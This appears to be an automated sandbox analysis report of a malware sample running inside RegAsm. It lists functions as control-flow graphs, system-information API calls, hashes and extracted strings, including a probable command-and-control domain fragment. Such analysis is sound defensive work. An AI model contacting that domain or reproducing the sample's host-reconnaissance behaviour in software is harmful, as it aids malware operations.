                                                                          control_flow_graph 214 40e2a9-40e2d1 call 4097b0 CoUninitialize 217 40e2e0-40e2f4 214->217 217->217 218 40e2f6-40e307 217->218 219 40e310-40e331 218->219 219->219 220 40e333-40e38e 219->220 221 40e390-40e3aa 220->221 221->221 222 40e3ac-40e3bd 221->222 223 40e3db-40e3e3 222->223 224 40e3bf-40e3cf 222->224 226 40e3e5-40e3e6 223->226 227 40e3fb-40e405 223->227 225 40e3d0-40e3d9 224->225 225->223 225->225 228 40e3f0-40e3f9 226->228 229 40e407-40e40b 227->229 230 40e41b-40e423 227->230 228->227 228->228 231 40e410-40e419 229->231 232 40e425-40e426 230->232 233 40e43b-40e445 230->233 231->230 231->231 234 40e430-40e439 232->234 235 40e447-40e44b 233->235 236 40e45b-40e467 233->236 234->233 234->234 237 40e450-40e459 235->237 238 40e481-40e5b7 236->238 239 40e469-40e46b 236->239 237->236 237->237 241 40e5c0-40e5d8 238->241 240 40e470-40e47d 239->240 240->240 242 40e47f 240->242 241->241 243 40e5da-40e5fb 241->243 242->238 244 40e600-40e628 243->244 244->244 245 40e62a-40e68f call 40b6a0 call 4097b0 CoUninitialize 244->245 250 40e690-40e6a4 245->250 250->250 251 40e6a6-40e6b8 250->251 252 40e6c0-40e6e1 251->252 252->252 253 40e6e3-40e73e 252->253 254 40e740-40e75a 253->254 254->254 255 40e75c-40e76d 254->255 256 40e77b-40e783 255->256 257 40e76f 255->257 259 40e785-40e786 256->259 260 40e79b-40e7a5 256->260 258 40e770-40e779 257->258 258->256 258->258 261 40e790-40e799 259->261 262 40e7a7-40e7ab 260->262 263 40e7bb-40e7c3 260->263 261->260 261->261 264 40e7b0-40e7b9 262->264 265 40e7c5-40e7c6 263->265 266 40e7db-40e7e5 263->266 264->263 264->264 267 40e7d0-40e7d9 265->267 268 40e7e7-40e7eb 266->268 269 40e7fb-40e807 266->269 267->266 267->267 272 40e7f0-40e7f9 268->272 270 40e821-40e948 269->270 271 40e809-40e80b 269->271 274 40e950-40e96a 270->274 273 40e810-40e81d 271->273 272->269 272->272 273->273 275 40e81f 273->275 274->274 276 40e96c-40e98f 274->276 275->270 277 40e990-40e9b9 276->277 277->277 278 40e9bb-40e9e2 call 40b6a0 277->278 280 40e9e7-40e9fd 278->280
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: Uninitialize
                                                                          • String ID: "# `$,$I~$`~$covery-mover.biz$qx$s
                                                                          • API String ID: 3861434553-1062613949
                                                                          • Opcode ID: 1bc8a25b561593e53d2d6339a02d65ee242e64d661e98e766194f6cca9f4be8c
                                                                          • Instruction ID: 550626b1aa1881637dc35d229a9c1637f44e71d1f63aa888f187a22684203b49
                                                                          • Opcode Fuzzy Hash: 1bc8a25b561593e53d2d6339a02d65ee242e64d661e98e766194f6cca9f4be8c
                                                                          • Instruction Fuzzy Hash: 2902B0B010C3D18BD3358F2684A07EBBFE1EF92304F189DADD4DA6B252D679040A8B57
                                                                          Function 004233A0 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 471COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 281 4233a0-4233ef 282 4233f0-423402 281->282 282->282 283 423404-423445 282->283 285 423450-42347c 283->285 285->285 286 42347e-423488 285->286 287 423610-42361d 286->287 288 423600-423607 286->288 289 4234c6 286->289 290 4234d7-4234e3 286->290 291 4234e4-4234f5 286->291 292 4237d5-42387f 286->292 293 4237ba 286->293 294 4237a8-4237b2 286->294 295 4234ce-4234d4 call 408000 286->295 296 42348f-423495 286->296 301 423626 287->301 302 42361f-423624 287->302 288->287 289->295 299 4234f7-4234fc 291->299 300 4234fe 291->300 297 423880-42389c 292->297 294->293 295->290 303 423497-42349c 296->303 304 42349e 296->304 297->297 307 42389e-4238ae call 4215f0 297->307 309 423500-423537 call 407ff0 299->309 300->309 305 42362d-4236d9 call 407ff0 301->305 302->305 306 4234a1-4234bf call 407ff0 303->306 304->306 319 4236e0-423724 305->319 306->287 306->288 306->289 306->290 306->291 306->292 306->293 306->294 306->295 317 4238b3-4238b6 307->317 318 423540-423585 309->318 323 4238be-4238db 317->323 318->318 320 423587-42358f 318->320 319->319 321 423726-42372e 319->321 324 4235b1-4235bd 320->324 325 423591-423596 320->325 326 423730-423737 321->326 327 423751-423761 321->327 328 4238e0-423904 323->328 330 4235e1-4235ec call 43d6c0 324->330 331 4235bf-4235c3 324->331 329 4235a0-4235af 325->329 332 423740-42374f 326->332 333 423763-423767 327->333 334 423781-4237a1 GetLogicalDrives call 43d6c0 327->334 328->328 335 423906-423989 328->335 329->324 329->329 342 4235f1-4235f9 330->342 337 4235d0-4235df 331->337 332->327 332->332 339 423770-42377f 333->339 334->290 334->293 334->294 334->295 334->323 345 4237c0-4237c6 call 408000 334->345 346 4239f1-4239f7 call 408000 334->346 347 4239eb 334->347 348 4237cf 334->348 336 423990-4239be 335->336 336->336 341 4239c0-4239e3 call 421270 336->341 337->330 337->337 339->334 339->339 341->347 342->287 342->288 342->292 342->293 342->294 342->323 342->345 345->348 347->346 348->292
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: #R,T$$^<P$VW$]~"p$ij$KM
                                                                          • API String ID: 0-788320361
                                                                          • Opcode ID: 83f2170b8c59a65a8a9960c15d95f04e83c213860b07ad3303ead03e3c572ec6
                                                                          • Instruction ID: 9ed236048ece28067beed024fb633757567cd4a7e3bca11c75bb2a7735f0e68b
                                                                          • Opcode Fuzzy Hash: 83f2170b8c59a65a8a9960c15d95f04e83c213860b07ad3303ead03e3c572ec6
                                                                          • Instruction Fuzzy Hash: D1F1CAB46083509FD310DF65E88262BBBF1EFD5304F44892DE4958B351EB789A06CB4B
                                                                          Function 0040A960 Relevance: 9.2, Strings: 7, Instructions: 401COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 354 40a960-40a989 355 40a990-40a9e5 354->355 355->355 356 40a9e7-40aadf 355->356 357 40aae0-40ab1b 356->357 357->357 358 40ab1d-40ab39 357->358 359 40ab40-40ab69 358->359 359->359 360 40ab6b-40ab7a call 40b6a0 359->360 362 40ab7f-40ab86 360->362 363 40ae29-40ae32 362->363 364 40ab8c-40ab98 362->364 365 40aba0-40abb2 364->365 365->365 366 40abb4-40abb9 365->366 367 40abc0-40abcc 366->367 368 40abd3-40abe4 367->368 369 40abce-40abd1 367->369 370 40ae20-40ae26 call 439b60 368->370 371 40abea-40abff 368->371 369->367 369->368 370->363 372 40ac00-40ac41 371->372 372->372 374 40ac43-40ac50 372->374 376 40ac52-40ac58 374->376 377 40ac84-40ac88 374->377 378 40ac67-40ac6b 376->378 379 40ae1e 377->379 380 40ac8e-40acb6 377->380 378->379 381 40ac71-40ac78 378->381 379->370 382 40acc0-40acf4 380->382 383 40ac7a-40ac7c 381->383 384 40ac7e 381->384 382->382 385 40acf6-40acff 382->385 383->384 386 40ac60-40ac65 384->386 387 40ac80-40ac82 384->387 388 40ad01-40ad0b 385->388 389 40ad34-40ad36 385->389 386->377 386->378 387->386 391 40ad17-40ad1b 388->391 389->379 390 40ad3c-40ad52 389->390 393 40ad60-40adb2 390->393 391->379 392 40ad21-40ad28 391->392 394 40ad2a-40ad2c 392->394 395 40ad2e 392->395 393->393 396 40adb4-40adbe 393->396 394->395 397 40ad10-40ad15 395->397 398 40ad30-40ad32 395->398 399 40adc0-40adc8 396->399 400 40adf4-40adf8 396->400 397->389 397->391 398->397 402 40add7-40addb 399->402 401 40adfe-40ae1c call 40a6d0 400->401 401->370 402->379 404 40addd-40ade4 402->404 406 40ade6-40ade8 404->406 407 40adea-40adec 404->407 406->407 408 40add0-40add5 407->408 409 40adee-40adf2 407->409 408->402 410 40adfa-40adfc 408->410 409->408 410->379 410->401
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: #xDz$'D F$A|}~$N[\D$N[\D$kl$n
                                                                          • API String ID: 0-490458541
                                                                          • Opcode ID: b00241246f4d0228e6e25298a947675e85839165aeb9511d476d344b8fc49fad
                                                                          • Instruction ID: 966b8f91f76bb20883ed88500b6b89ab0c93423946d56f050922860fedc986fe
                                                                          • Opcode Fuzzy Hash: b00241246f4d0228e6e25298a947675e85839165aeb9511d476d344b8fc49fad
                                                                          • Instruction Fuzzy Hash: D7C1267260C3504BC714CF6488905AFBBD3ABC2304F1E893DE9D56B382D679991AC78B
                                                                          Function 0040CE55 Relevance: 9.0, Strings: 7, Instructions: 275COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 411 40ce55-40ce62 412 40ce70-40ce9b 411->412 412->412 413 40ce9d-40ced5 call 408720 call 436f90 412->413 418 40cee0-40cf06 413->418 418->418 419 40cf08-40cf6b 418->419 420 40cf70-40cfa7 419->420 420->420 421 40cfa9-40cfba 420->421 422 40cfc0-40cfcb 421->422 423 40d03d 421->423 425 40cfd0-40cfd9 422->425 424 40d041-40d049 423->424 426 40d05b-40d068 424->426 427 40d04b-40d04f 424->427 425->425 428 40cfdb 425->428 430 40d06a-40d071 426->430 431 40d08b-40d093 426->431 429 40d050-40d059 427->429 428->424 429->426 429->429 432 40d080-40d089 430->432 433 40d095-40d096 431->433 434 40d0ab-40d1c6 431->434 432->431 432->432 435 40d0a0-40d0a9 433->435 436 40d1d0-40d215 434->436 435->434 435->435 436->436 437 40d217-40d239 436->437 438 40d240-40d250 437->438 438->438 439 40d252-40d27f call 40b6a0 438->439 441 40d284-40d29e 439->441
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 2AA6A2C71324A32B23D904AF30EFEBBC$F^$I@$N~ :$VgfW$covery-mover.biz$z@(
                                                                          • API String ID: 0-2083548517
                                                                          • Opcode ID: a8b82ccc30708ca5d3da64cc2461f8570c754c905fc98211d30cc89c72c56c70
                                                                          • Instruction ID: b1d760c26d9b90ec4573806c6615211f8657e28aa76e89aec63d6860f5017e85
                                                                          • Opcode Fuzzy Hash: a8b82ccc30708ca5d3da64cc2461f8570c754c905fc98211d30cc89c72c56c70
                                                                          • Instruction Fuzzy Hash: A191EEB05083C18BD335CF25D8A0BEBBBE0AB96314F148D6DD4DD9B282D738454ACB96
                                                                          Function 004087F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 442 4087f0-4087fe call 43afd0 445 408804-40880b call 434680 442->445 446 408979-40897b ExitProcess 442->446 449 408811-408849 GetCurrentProcessId GetCurrentThreadId 445->449 450 408974 call 43b400 445->450 452 408851-4088d6 GetForegroundWindow 449->452 453 40884b-40884f 449->453 450->446 454 408950-408968 call 409cc0 452->454 455 4088d8-40894e 452->455 453->452 454->450 458 40896a call 40cdf0 454->458 455->454 460 40896f call 40b670 458->460 460->450
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcess$ExitForegroundThreadWindow
                                                                          • String ID: YO9W
                                                                          • API String ID: 3118123366-386669604
                                                                          • Opcode ID: 81875feee291dd51c94163340b3786e966dc5896524b3e4d2eaf5977dbc455ff
                                                                          • Instruction ID: 5b12a659e8285d1355c3597aa5681aa9478bfa7506ef17589c1493984f4e9e7d
                                                                          • Opcode Fuzzy Hash: 81875feee291dd51c94163340b3786e966dc5896524b3e4d2eaf5977dbc455ff
                                                                          • Instruction Fuzzy Hash: 98315977F5061807C31C7AB98C4636AB5874BC4614F0F863E9DD9AB386FDB89C0442D9
                                                                          Function 0042BFDA Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 461COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 462 42bfda-42c03f call 43ce00 466 42c040-42c06c 462->466 466->466 467 42c06e-42c078 466->467 468 42c07a-42c083 467->468 469 42c09d 467->469 470 42c090-42c099 468->470 471 42c09f-42c0ac 469->471 470->470 472 42c09b 470->472 473 42c0cb-42c13a FreeLibrary call 43ce00 GetComputerNameExA 471->473 474 42c0ae-42c0b5 471->474 472->471 479 42c140-42c167 473->479 475 42c0c0-42c0c9 474->475 475->473 475->475 479->479 480 42c169-42c173 479->480 481 42c175-42c17f 480->481 482 42c18d 480->482 483 42c180-42c189 481->483 484 42c18f-42c19c 482->484 483->483 487 42c18b 483->487 485 42c1bb-42c20f GetComputerNameExA 484->485 486 42c19e-42c1a5 484->486 489 42c210-42c252 485->489 488 42c1b0-42c1b9 486->488 487->484 488->485 488->488 489->489 490 42c254-42c25e 489->490 491 42c260-42c267 490->491 492 42c27b-42c288 490->492 493 42c270-42c279 491->493 494 42c28a-42c291 492->494 495 42c2ab-42c2ff 492->495 493->492 493->493 496 42c2a0-42c2a9 494->496 498 42c300-42c324 495->498 496->495 496->496 498->498 499 42c326-42c330 498->499 500 42c332-42c339 499->500 501 42c34b-42c358 499->501 502 42c340-42c349 500->502 503 42c35a-42c361 501->503 504 42c37b-42c3d6 call 43ce00 501->504 502->501 502->502 505 42c370-42c379 503->505 509 42c3e0-42c3fa 504->509 505->504 505->505 509->509 510 42c3fc-42c406 509->510 511 42c41b-42c42f 510->511 512 42c408-42c40f 510->512 514 42c572-42c5b1 511->514 515 42c435-42c43c 511->515 513 42c410-42c419 512->513 513->511 513->513 516 42c5c0-42c5e7 514->516 517 42c440-42c44a 515->517 516->516 520 42c5e9-42c5fb 516->520 518 42c460-42c466 517->518 519 42c44c-42c451 517->519 522 42c490-42c49e 518->522 523 42c468-42c46b 518->523 521 42c510-42c516 519->521 524 42c61b-42c61e call 430520 520->524 525 42c5fd-42c604 520->525 531 42c518-42c51e 521->531 528 42c4a4-42c4a7 522->528 529 42c52a-42c533 522->529 523->522 526 42c46d-42c483 523->526 533 42c623-42c643 524->533 527 42c610-42c619 525->527 526->521 527->524 527->527 528->529 532 42c4ad-42c50e 528->532 535 42c535-42c537 529->535 536 42c539-42c53c 529->536 531->514 534 42c520-42c522 531->534 532->521 534->517 537 42c528 534->537 535->531 538 42c56e-42c570 536->538 539 42c53e-42c56c 536->539 537->514 538->521 539->521
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(?), ref: 0042C0D7
                                                                          • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042C113
                                                                          • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042C1D8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: ComputerName$FreeLibrary
                                                                          • String ID: x
                                                                          • API String ID: 2243422189-2363233923
                                                                          • Opcode ID: 212c4427347d00bc0ab6c4fd254bb844e7ef8bf1701165750c227f18fd5959f2
                                                                          • Instruction ID: f24e0535182122329204161442b6cb3576d9d8656e0dc52521a12abdc108ad65
                                                                          • Opcode Fuzzy Hash: 212c4427347d00bc0ab6c4fd254bb844e7ef8bf1701165750c227f18fd5959f2
                                                                          • Instruction Fuzzy Hash: EFD1B46060C3E08ED7358B2994903BFBBD1AFD7344F5849ADD0C99B282D779450ACB57
                                                                          Function 0040C36E Relevance: 6.5, Strings: 5, Instructions: 203COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 600 40c36e-40c559 601 40c560-40c58e 600->601 601->601 602 40c590-40c7ab 601->602 604 40c7b0-40c7de 602->604 604->604 605 40c7e0-40c7e8 604->605 606 40c7ec-40c7ff 605->606
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ){+}$4cde$CJ$F'k)$GS
                                                                          • API String ID: 0-4192230409
                                                                          • Opcode ID: 5de04a91f599762488a7f1befa48500976ff1de46b0c1ed8ec4e4c363fac47c6
                                                                          • Instruction ID: 6afdb2316fdadaf12e32bd698f1912d34734f08b0bc4a82971b76fff6b28e520
                                                                          • Opcode Fuzzy Hash: 5de04a91f599762488a7f1befa48500976ff1de46b0c1ed8ec4e4c363fac47c6
                                                                          • Instruction Fuzzy Hash: 50B11BB84053058FE354DF629688FAA7BB0FB25310F1A82E9E0992F776D7748405CF96
                                                                          Function 0042C6D7 Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 614COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 607 42c6d7-42c6ff 608 42c700-42c74f 607->608 608->608 609 42c751-42c761 608->609 610 42c763-42c76f 609->610 611 42c77b-42c787 609->611 612 42c770-42c779 610->612 613 42c7a1-42c803 call 43ce00 call 41dc20 611->613 614 42c789-42c78b 611->614 612->611 612->612 622 42c810-42c82a 613->622 615 42c790-42c79d 614->615 615->615 617 42c79f 615->617 617->613 622->622 623 42c82c-42c85f 622->623 624 42c860-42c886 623->624 624->624 625 42c888-42c892 624->625 626 42c894-42c89b 625->626 627 42c8ab-42c8b3 625->627 628 42c8a0-42c8a9 626->628 629 42c8b5-42c8b6 627->629 630 42c8cb-42c8d8 627->630 628->627 628->628 631 42c8c0-42c8c9 629->631 632 42c8da-42c8e1 630->632 633 42c8fb-42c946 630->633 631->630 631->631 634 42c8f0-42c8f9 632->634 635 42c950-42c978 633->635 634->633 634->634 635->635 636 42c97a-42c984 635->636 637 42c986-42c98f 636->637 638 42c99b-42c9a5 636->638 641 42c990-42c999 637->641 639 42c9a7-42c9ab 638->639 640 42c9bb-42ca35 638->640 642 42c9b0-42c9b9 639->642 643 42cad8-42cb04 640->643 641->638 641->641 642->640 642->642 644 42cb10-42cb60 643->644 644->644 645 42cb62-42cb72 644->645 646 42cb74-42cb76 645->646 647 42cb8b-42cb97 645->647 648 42cb80-42cb89 646->648 649 42cbb1-42cbf7 call 43ce00 GetPhysicallyInstalledSystemMemory call 41dc20 647->649 650 42cb99-42cb9b 647->650 648->647 648->648 656 42cbfc-42cc13 649->656 652 42cba0-42cbad 650->652 652->652 654 42cbaf 652->654 654->649 657 42cc20-42cc3a 656->657 657->657 658 42cc3c-42cc6f 657->658 659 42cc70-42cc96 658->659 659->659 660 42cc98-42cca2 659->660 661 42cca4-42ccab 660->661 662 42ccbb-42ccc3 660->662 663 42ccb0-42ccb9 661->663 664 42ccc5-42ccc6 662->664 665 42ccdb-42cce8 662->665 663->662 663->663 666 42ccd0-42ccd9 664->666 667 42ccea-42ccf1 665->667 668 42cd0b-42cd56 665->668 666->665 666->666 670 42cd00-42cd09 667->670 669 42cd60-42cd88 668->669 669->669 671 42cd8a-42cd98 669->671 670->668 670->670 672 42cd9a-42cda1 671->672 673 42cdbb-42cdc5 671->673 674 42cdb0-42cdb9 672->674 675 42ca40-42cad5 673->675 676 42cdcb 673->676 674->673 674->674 675->643 677 42cdd0-42cdd9 676->677 677->677 678 42cddb 677->678 678->675
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: '$iJ
                                                                          • API String ID: 0-30662343
                                                                          • Opcode ID: 5f8335f824c18f5e14225d200a316fb8f8740858805ddfb73ef0b7ad87012508
                                                                          • Instruction ID: e8033de2897f6a471e39d6e72682695b514e130b01bc458e21cc2d5cc8d806b0
                                                                          • Opcode Fuzzy Hash: 5f8335f824c18f5e14225d200a316fb8f8740858805ddfb73ef0b7ad87012508
                                                                          • Instruction Fuzzy Hash: 7C02F57060C3E18FD7298F2990A03ABBFE1AF97304F58496ED4D997342D77984058B97
                                                                          Function 0042BFD3 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 456COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 679 42bfd3-42c0e8 call 43ce00 682 42c0ed-42c13a GetComputerNameExA 679->682 683 42c140-42c167 682->683 683->683 684 42c169-42c173 683->684 685 42c175-42c17f 684->685 686 42c18d 684->686 687 42c180-42c189 685->687 688 42c18f-42c19c 686->688 687->687 691 42c18b 687->691 689 42c1bb-42c20f GetComputerNameExA 688->689 690 42c19e-42c1a5 688->690 693 42c210-42c252 689->693 692 42c1b0-42c1b9 690->692 691->688 692->689 692->692 693->693 694 42c254-42c25e 693->694 695 42c260-42c267 694->695 696 42c27b-42c288 694->696 697 42c270-42c279 695->697 698 42c28a-42c291 696->698 699 42c2ab-42c2ff 696->699 697->696 697->697 700 42c2a0-42c2a9 698->700 702 42c300-42c324 699->702 700->699 700->700 702->702 703 42c326-42c330 702->703 704 42c332-42c339 703->704 705 42c34b-42c358 703->705 706 42c340-42c349 704->706 707 42c35a-42c361 705->707 708 42c37b-42c3d6 call 43ce00 705->708 706->705 706->706 709 42c370-42c379 707->709 713 42c3e0-42c3fa 708->713 709->708 709->709 713->713 714 42c3fc-42c406 713->714 715 42c41b-42c42f 714->715 716 42c408-42c40f 714->716 718 42c572-42c5b1 715->718 719 42c435-42c43c 715->719 717 42c410-42c419 716->717 717->715 717->717 720 42c5c0-42c5e7 718->720 721 42c440-42c44a 719->721 720->720 724 42c5e9-42c5fb 720->724 722 42c460-42c466 721->722 723 42c44c-42c451 721->723 726 42c490-42c49e 722->726 727 42c468-42c46b 722->727 725 42c510-42c516 723->725 728 42c61b-42c61e call 430520 724->728 729 42c5fd-42c604 724->729 735 42c518-42c51e 725->735 732 42c4a4-42c4a7 726->732 733 42c52a-42c533 726->733 727->726 730 42c46d-42c483 727->730 737 42c623-42c643 728->737 731 42c610-42c619 729->731 730->725 731->728 731->731 732->733 736 42c4ad-42c50e 732->736 739 42c535-42c537 733->739 740 42c539-42c53c 733->740 735->718 738 42c520-42c522 735->738 736->725 738->721 741 42c528 738->741 739->735 742 42c56e-42c570 740->742 743 42c53e-42c56c 740->743 741->718 742->725 743->725
                                                                          APIs
                                                                          • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042C113
                                                                          • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042C1D8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: ComputerName
                                                                          • String ID: x
                                                                          • API String ID: 3545744682-2363233923
                                                                          • Opcode ID: dd7dd52a73c17c107c662ee8ca0c022aa0f15367076f24ecb02be622242e9914
                                                                          • Instruction ID: cbfe56490d4610b99627c39bd120223bdbde8b4c29662e55905f397c0fd00549
                                                                          • Opcode Fuzzy Hash: dd7dd52a73c17c107c662ee8ca0c022aa0f15367076f24ecb02be622242e9914
                                                                          • Instruction Fuzzy Hash: 1AD1176060C7E18ED7358B2894903BFBBD1AF97344F5849AED0D54B382D739940AC797
                                                                          Function 00426170 Relevance: 5.3, Strings: 4, Instructions: 318COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 788 426170-42618f 789 426190-4261bf 788->789 789->789 790 4261c1-4261cd 789->790 791 426214-426221 790->791 792 4261cf-4261d7 790->792 793 426230-426283 791->793 794 4261e0-4261e7 792->794 793->793 795 426285-426289 793->795 796 4261f0-4261f6 794->796 797 4261e9-4261ec 794->797 799 426310-426312 795->799 800 42628f-4262af call 439b40 795->800 796->791 798 4261f8-42620c call 43b480 796->798 797->794 801 4261ee 797->801 805 426211 798->805 802 4264ef-4264f8 799->802 807 4262b0-4262df 800->807 801->791 805->791 807->807 808 4262e1-4262ed 807->808 809 426336-42633a 808->809 810 4262ef-4262f7 808->810 811 426340-426349 809->811 812 4264e6-4264ec call 439b60 809->812 813 426300-426307 810->813 814 426350-426365 811->814 812->802 816 426317-42631d 813->816 817 426309-42630c 813->817 814->814 819 426367-426369 814->819 816->809 818 42631f-42632e call 43b480 816->818 817->813 821 42630e 817->821 825 426333 818->825 823 426370-42637d call 407ff0 819->823 824 42636b 819->824 821->809 828 426390-42639a 823->828 824->823 825->809 829 426380-42638e 828->829 830 42639c-42639f 828->830 829->828 831 4263b3-4263b7 829->831 832 4263a0-4263af 830->832 834 4264dd-4264e3 call 408000 831->834 835 4263bd-4263c8 831->835 832->832 833 4263b1 832->833 833->829 834->812 836 4263ca-4263d1 835->836 837 42641b-426467 call 407ff0 call 408e90 835->837 839 4263ec-4263f0 836->839 851 426470-4264b8 837->851 842 4263f2-4263fb 839->842 843 4263e0 839->843 846 426410-426414 842->846 847 4263fd-426400 842->847 845 4263e1-4263ea 843->845 845->837 845->839 846->845 849 426416-426419 846->849 847->845 849->845 851->851 852 4264ba-4264d9 call 408ff0 call 408000 851->852 852->834
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: 4zVc$8zVc$YNMZ$cba`
                                                                          • API String ID: 2994545307-1799417857
                                                                          • Opcode ID: eaf66d541d549ce35d0b7173bc81318c446716c3833972a3082171e3945cfb6b
                                                                          • Instruction ID: a4538a0261ff6c2ac210d57fc6ac5424e6a326b8b8d8802f404cc31a7d59ec03
                                                                          • Opcode Fuzzy Hash: eaf66d541d549ce35d0b7173bc81318c446716c3833972a3082171e3945cfb6b
                                                                          • Instruction Fuzzy Hash: 189147B2F042208BD724DA25EC8172B7292EBD1314F5A857EEC8597342E678AC00C7DA
                                                                          Function 00416B7E Relevance: 1.8, APIs: 1, Instructions: 335COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 890e8e76508b01334db47f64388eac8d659fe5be4548ddbfe270fdd3745dd69d
                                                                          • Instruction ID: 4d3fd89be0cb7aed4be93335616a378edd6ad360b4f2b7dd84c825cf95623c92
                                                                          • Opcode Fuzzy Hash: 890e8e76508b01334db47f64388eac8d659fe5be4548ddbfe270fdd3745dd69d
                                                                          • Instruction Fuzzy Hash: 9BA159B16047418FCB24CF34C891663BBE2FF56314B098A6ED49A8B792E738F845CB55
                                                                          Function 0043E690 Relevance: 1.6, Strings: 1, Instructions: 384COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: @CDE
                                                                          • API String ID: 2994545307-1513065382
                                                                          • Opcode ID: cbdfbb28d977ac1ea6b7f73f0ada9322f454d3da5a8c62154e5dc83033fd8ee1
                                                                          • Instruction ID: 3c5ac0be7424b57116813a4f2293c38aabf5a2246835f37d4781b8179357b19c
                                                                          • Opcode Fuzzy Hash: cbdfbb28d977ac1ea6b7f73f0ada9322f454d3da5a8c62154e5dc83033fd8ee1
